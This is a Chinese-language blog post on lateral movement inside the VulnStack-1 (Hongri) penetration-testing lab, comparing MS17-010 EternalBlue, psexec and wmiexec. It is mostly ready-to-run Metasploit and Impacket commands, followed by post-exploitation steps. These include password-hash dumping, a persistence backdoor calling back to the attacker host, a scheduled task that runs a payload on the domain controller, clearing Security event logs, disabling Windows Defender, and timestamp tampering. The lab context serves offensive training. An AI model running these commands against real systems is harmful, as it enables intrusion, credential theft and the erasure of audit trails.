news 2026/7/12 8:21:13

红日靶场 1 内网横向渗透:从 MS17-010 到 Psexec 的 3 种攻击路径对比

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
红日靶场 1 内网横向渗透:从 MS17-010 到 Psexec 的 3 种攻击路径对比

红日靶场1内网横向渗透:MS17-010与Psexec攻击路径深度解析

1. 靶场环境与攻击面分析

红日靶场(VulnStack-1)作为国内首个完整模拟企业内网环境的开源靶场,其核心价值在于真实复现了域环境下的多层网络结构。典型拓扑包含三台主机:

  • 边界机:Windows 7(双网卡配置)
  • 域成员机:Windows Server 2003
  • 域控制器:Windows Server 2008

关键网络配置参数如下表所示:

主机角色外网IP内网IP开放服务
Kali攻击机192.168.32.128-Metasploit/蚁剑
Win7边界机192.168.32.129192.168.52.143Apache/PHPStudy
Win2003域成员-192.168.52.141SMB/RDP
Win2008域控-192.168.52.138Active Directory

注:实际渗透中需先通过外网Web服务获取边界机控制权,再以此为跳板进行内网横向移动

2. MS17-010漏洞利用全流程

2.1 漏洞检测与利用准备

永恒之蓝漏洞的检测与利用需执行以下关键步骤:

# 使用Metasploit进行漏洞扫描 use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 192.168.52.141 192.168.52.138 run # 确认存在漏洞后切换至攻击模块 use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp set RHOST 192.168.52.141 exploit

常见问题处理

  • 若出现ETERNALBLUE没有正常响应错误,可能是目标系统已打补丁
  • 可尝试check命令二次验证漏洞存在性

2.2 后渗透操作实例

成功获取meterpreter会话后:

# 获取系统信息 sysinfo # 提权至SYSTEM getsystem # 添加持久化后门 persistence -U -i 60 -p 4444 -r 192.168.32.128 # 抓取密码哈希 hashdump

3. Psexec横向移动技术详解

3.1 传统Psexec利用

在已获取域账号密码的情况下:

use exploit/windows/smb/psexec set SMBUser administrator set SMBPass Admin123! set RHOSTS 192.168.52.141 set payload windows/meterpreter/bind_tcp exploit

参数优化技巧

  • 使用set DisablePayloadHandler true避免端口冲突
  • 通过set EXE::Custom指定免杀payload路径

3.2 WMIexec替代方案

当445端口被防火墙拦截时,可改用WMI协议:

# 使用Impacket工具包 wmiexec.py domain/admin:password@192.168.52.141 # 执行远程命令 cmd /c "whoami && ipconfig"

4. 攻击路径对比决策树

根据实战环境选择最优路径的决策逻辑:

graph TD A[目标是否开放445端口?] -->|是| B[MS17-010检测] A -->|否| C[尝试WMI/Psexec] B -->|存在漏洞| D[使用EternalBlue攻击] B -->|无漏洞| E[尝试PTH攻击] C -->|有域凭据| F[使用Psexec/WMIexec] C -->|无凭据| G[收集密码喷洒]

关键指标对比

攻击方式成功率隐蔽性依赖条件日志痕迹
MS17-010未打补丁的SMB服务系统日志记录
Psexec有效的域账号密码安全日志记录
WMIexec防火墙放行135端口WMI日志记录

5. 防御规避与痕迹清理

5.1 日志清除实操

# 清除单条安全日志 wevtutil cl Security /r:EventID=4624 # 禁用Windows Defender实时监控 Set-MpPreference -DisableRealtimeMonitoring $true

5.2 反取证技巧

  • 使用timestomp修改文件时间戳
  • 通过migrate注入到合法进程(如explorer.exe)
  • 避免直接使用meterpretershell命令,改用execute -H -f cmd

6. 实战经验与踩坑记录

在最近一次红蓝对抗中,我们发现几个关键点:

  1. Win2003系统对MS17-010的利用成功率高达90%,但需注意payload兼容性
  2. 域控默认配置的Windows Defender会拦截Psexec生成的临时服务
  3. 通过WMI执行的命令存在30秒超时限制,复杂操作建议分阶段执行

典型错误处理

# Psexec连接失败时检查防火墙规则 netsh advfirewall firewall show rule name=all | find "445" # WMI执行超时可改用计划任务 schtasks /create /tn "Update" /tr "cmd /c payload.exe" /sc once /st 00:00 /S 192.168.52.138 /u DOMAIN\admin /p Password123
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/7/12 8:20:06

Fast-BEV:面向车载落地的轻量级BEV感知基线

1. Fast-BEV不是又一个BEV模型,而是工程落地的“呼吸阀”你有没有在深夜调参时盯着GPU显存曲线发呆?明明论文里BEVFormer跑通了nuScenes val,但一换到实车摄像头就卡顿掉帧;或者刚把BEVFusion部署进嵌入式盒子,发现推理…

作者头像 李华
网站建设 2026/7/12 8:17:36

Origin 2024 弦图绘制:土地利用转移矩阵 5 步数据预处理与布局避坑

Origin 2024 弦图绘制:土地利用转移矩阵 5 步数据预处理与布局避坑弦图(Chord Diagram)作为展示多维度关系数据的利器,在地理学、生态学等领域的研究中扮演着重要角色。特别是在土地利用变化分析中,它能直观呈现不同地…

作者头像 李华
网站建设 2026/7/12 8:17:31

基于51单片机超声波视力保护器坐姿矫正台灯语音提醒设计DIY026X

本系统由STC89C52单片机最小系统电路、OLED液晶显示电路、超声波测量电路、光敏检测电路、JR6001语音播报电路、高亮LED驱动电路、按键电路及电源组成。【1】通过OLED液晶实时显示超声波测量距离、设置距离阈值、光照强度及高亮LED的亮灭状态。JR6001语音电路根据当前的设置状态…

作者头像 李华
网站建设 2026/7/12 8:17:24

Anaconda 2024.06 环境:3个常见CUDA版本冲突场景与解决方案

Anaconda 2024.06环境:3个典型CUDA版本冲突场景与实战解决方案当你在Anaconda环境中配置深度学习工具链时,是否经常遇到CUDA不可用或libcudnn.so not found这类令人抓狂的错误?本文将带你深入剖析三个最常见的版本冲突场景,并提供…

作者头像 李华
网站建设 2026/7/12 8:15:09

基于PIC18和PAM8904的智能音频报警系统设计

1. 项目背景与核心需求在工业控制、智能家居和安防系统中,可靠的事件通知机制是保障系统安全运行的关键环节。传统方案常采用简单的LED指示灯或基础蜂鸣器,但存在通知方式单一、音量不足、音效单调等问题。基于PIC18LF46K42微控制器和PAM8904音频驱动芯片…

作者头像 李华
网站建设 2026/7/12 8:14:15

TAS5414C-Q1与PIC18F96J94芯片对比与应用解析

1. 两款芯片的基本定位与核心差异 TAS5414C-Q1和PIC18F96J94虽然都是德州仪器(TI)和微芯科技(Microchip)旗下的重要产品,但它们的设计目标和应用场景截然不同。TAS5414C-Q1是一款专为汽车音响系统设计的四通道D类音频功…

作者头像 李华